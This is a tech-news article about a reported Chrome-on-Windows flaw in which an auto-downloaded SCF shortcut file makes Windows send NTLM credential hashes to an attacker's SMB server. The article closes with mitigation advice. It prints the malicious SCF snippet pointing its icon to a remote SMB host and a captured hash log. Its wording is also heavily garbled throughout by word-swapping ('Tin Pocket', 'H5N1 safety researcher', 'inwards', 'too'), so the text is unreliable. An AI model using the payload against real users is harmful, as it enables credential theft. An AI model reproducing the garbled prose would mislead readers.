Beware! Hackers Tin Pocket Your Windows Password Remotely Using Chrome

H5N1 safety researcher has discovered a serious vulnerability inwards the default configuration of the latest version of Google's Chrome running on whatever version of Microsoft's Windows operating system, including Windows 10, that could permit remote hackers to pocket user's login credentials.

Researcher Bosko Stankovic of DefenseCode has industrial plant life that only past times visiting a website containing a malicious SCF file could permit victims to unknowingly part their computer's login credentials alongside hackers via Chrome too the SMB protocol.

This technique is non novel too was exploited past times the Stuxnet — a powerful malware that especially designed to destroy Iran's nuclear programme — that used the Windows shortcut LNK files to compromise systems.

What’s brand this assault unlike from others is the fact that such SMB authentication related attacks lead maintain been start fourth dimension demonstrated on Google Chrome publicly, after Internet Explorer (IE) too Edge.

Chrome + SCF + SMB = Stealing Windows Credentials

SCF (Shell Command File) shortcut file format works similar every bit LNK files too is designed to back upwards a express fix of Windows Explorer commands that assist define an icon on your desktop, such every bit My Computer too Recycle Bin.

"Currently, the assailant only needs to entice the victim (using fully updated Google Chrome too Windows) to see his website to survive able to move out along too reuse victim’s authentication credentials," Stankovic wrote inwards a weblog post, describing the flaw.

Basically, shortcut links on your desktop are a text file alongside a specific syntax of trounce code that defines the place of icon/thumbnail, application's call too it's location.

[Shell]
Command=2
IconFile=explorer.exe,3

Since Chrome trusts Windows SCF files, attackers tin lavatory line a fast i on victims into visiting their website containing a maliciously crafted shortcut file, which gets downloaded automatically onto the target systems without prompting confirmation from the users.

As presently every bit the user opens the folder containing that downloaded file, straight off or later, this file automatically runs to recollect an icon without the user having to click on it.

But instead of setting the place of an icon image, the malicious SCF file created past times the assailant incorporate the place of a remote SMB server (controlled past times the attacker).

[Shell]
IconFile=\\170.170.170.170\icon

So, every bit presently every bit the SCF file attempts to recollect the icon image, it volition line a fast i on into making an automatic authentication alongside the attacker’s controlled remote server over SMB protocol, handing over the victim's username too hashed version of password, allowing the assailant to utilisation your credentials to authenticate to your personal reckoner or network resource.

"Setting an icon place to a remote SMB server is a known assault vector that abuses the Windows automatic authentication characteristic when accessing services similar remote file shares," Stankovic said.

But next the Stuxnet attacks, Microsoft forced LNK files to charge their icons only from local resources hence they'd no longer survive vulnerable to such attacks which brand them charge malicious code from exterior servers.

However, SCF files were left alone.

Exploiting LM/NTLM Hash Authentication via SCF File

Image Source: SANS

But why would your Windows PC automatically manus over your credentials to the server?

If you lot are unaware, this is how authentication via the Server Message Block (SMB) protocol works inwards combination alongside the NTLM challenge/response authentication mechanism.

In short, LM/NTLM authentication works inwards four steps:

• Windows users (client) attempts to log into a server.
• The server responds alongside a challenge value, asking the user to encrypt the challenge value alongside his hash password too ship it back.
• Windows handles the SCF asking past times sending the client’s username too hashed version of the password to the server.
• The server hence captures that answer too approves authentication, if the client's hash password is correct.

Now, inwards the SCF assault scenario, elaborated past times Stankovic, Windows volition essay to authenticate to the malicious SMB server automatically past times providing the victim's username too NTLMv2 password hashes (a personal reckoner or network resource) to the server, every bit described inwards above-mentioned pace 3.

If the user is purpose of a corporate network, the network credentials assigned to the user past times his company's sysadmin volition survive sent to the attacker.

If the victim is a habitation user, the victim's Windows username too password volition survive sent to the attacker.

[*] SMB Captured - 2017-05-15 13:10:44 +0200
NTLMv2 Response Captured from 173.203.29.182:62521 - 173.203.29.182
USER:Bosko DOMAIN:Master OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:98daf39c3a253bbe4a289e7a746d4b24
NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e000000000200000000000
00000000000

Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000

No doubt, the credentials are encrypted but tin lavatory survive "brute-forced" afterward to recollect master login password inwards patently text.

"It is worth mentioning that SCF files volition appear extensionless inwards Windows Explorer regardless of file too folder settings," the researcher said. "Therefore, file named picture.jpg.scf volition appear inwards Windows Explorer every bit picture.jpg. This adds to inconspicuous nature of attacks using SCF files."

No Need to Decrypt Password *Sometimes*

Since a publish of Microsoft services convey the password inwards its hashed form, the assailant tin lavatory fifty-fifty utilisation the encrypted password to login to your OneDrive, Outlook.com, Office 365, Office Online, Skype, Xbox Live too other Microsoft services, making the decryption unnecessary.

Such vulnerabilities, according to the researcher, could too pose a serious threat to large organizations every bit they enable attackers to impersonate i of their members, allowing attackers to straight off reuse gained privileges to farther escalate access too make access too command of their information technology resources too perform attacks on other members.

How to Prevent Such SMB Authentication-related Attacks

Simply, block outbound SMB connections (TCP ports 139 too 445) from the local network to the WAN via firewalls, hence that local computers tin lavatory non inquiry remote SMB servers.

Stankovic too advises users to take in disabling automatic downloads inwards Google Chrome past times going to Settings → Show advanced settings → too hence Check the "Ask where to salve each file earlier downloading" option.

This modify volition permit you lot to manually approve each download attempt, which would significantly decrease the run a peril of credential theft attacks using SCF files.

Google is aware of the vulnerability too is said to survive working on a patch, but no timeframe has been given every bit to when the piece volition survive made available to the users.

Share This :